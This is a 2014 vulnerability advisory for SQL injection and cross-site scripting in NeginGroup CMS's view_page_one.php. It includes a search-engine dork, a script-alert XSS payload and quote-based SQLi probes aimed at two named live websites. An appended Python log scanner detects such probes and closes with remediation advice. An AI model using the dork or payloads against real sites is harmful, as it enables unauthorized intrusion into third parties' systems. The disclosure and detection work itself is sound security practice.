Sites created by NeginGroup suffer from cross-site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.
73bf857fa364642f3fa21c1fb9d3e05d25d39ed86e9f9879052560a5cb108b6f
[+] Title: Sql Injection / Xss on NeginGroup CMS
[+] Date: 2014/5/29
[+] Author: Hekt0r
[+] Vendor Homepage: www.NeginGroup.com
[+] Tested on: Windows 7 & Kali Linux
[+] Vulnerable File: /view_page_one.php
[+] Dork: intext:www.NeginGroup.com inurl:/view_page_one.php?v=
### Exploitation:
[+] Exploit Sql Injection: http://site/view_page_one.php?v=[SQL-Injection]
[+] Exploit Xss: http://site/view_page_one.php?v=[Xss]
### Demo:
[+] Sqli: http://www.irantwins.com/view_page_one.php?v=1'
http://jovainco.com/view_page_one.php?v=3'
[+] Xss: http://www.irantwins.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
http://jovainco.com/view_page_one.php?v=
<script>alert(/Xss/)</script>
[+] Special Thanks: Root SmasheR, Mr.Moein, UmPire, Saeed.Jok3r, M4hdi, ALIREZA_PROMIS, LiNuX-LoVeR and all members of Iran Security Group
[+] iransec.net
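
For defenders running a NeginGroup-built site, the following added example (not part of the original advisory) scans web access logs for requests to /view_page_one.php whose `v` parameter is not a plain number, which is what both demo request types above have in common. The combined log format, the assumption that legitimate `v` values are numeric IDs, the function names and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/view_page_one.php"  # vulnerable file named in the advisory
# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify_v(value):
    """Classify one URL-decoded `v` value (assumption: real values are numeric IDs)."""
    if re.fullmatch(r"[0-9]+", value):
        return "ok"
    if re.search(r"[<>]|script", value, re.I):
        return "xss-probe"
    if re.search(r"['\"]|--|/\*|\b(?:union|select)\b", value, re.I):
        return "sqli-probe"
    return "non-numeric"

def scan(lines):
    """Return (client, verdict, value) for every suspicious request to VULN_PATH."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.lower() != VULN_PATH:
            continue
        # parse_qs percent-decodes, so encoded probes are classified on their real content
        for value in parse_qs(url.query, keep_blank_values=True).get("v", []):
            verdict = classify_v(value)
            if verdict != "ok":
                hits.append((line.split()[0], verdict, value))
    return hits

# Constructed sample entries (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2014:10:00:01 +0000] "GET /view_page_one.php?v=3 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [29/May/2014:10:00:05 +0000] "GET /view_page_one.php?v=1%27 HTTP/1.1" 500 312',
    '198.51.100.7 - - [29/May/2014:10:00:09 +0000] "GET /view_page_one.php?v=%3Cscript%3Ealert(/Xss/)%3C/script%3E HTTP/1.1" 200 4980',
    '192.0.2.44 - - [29/May/2014:10:01:00 +0000] "GET /index.php?v=1%27 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value!r}")
```

Detection does not fix the flaw: the page should accept only an integer for `v`, bind it in a parameterised query, and HTML-encode anything it echoes back.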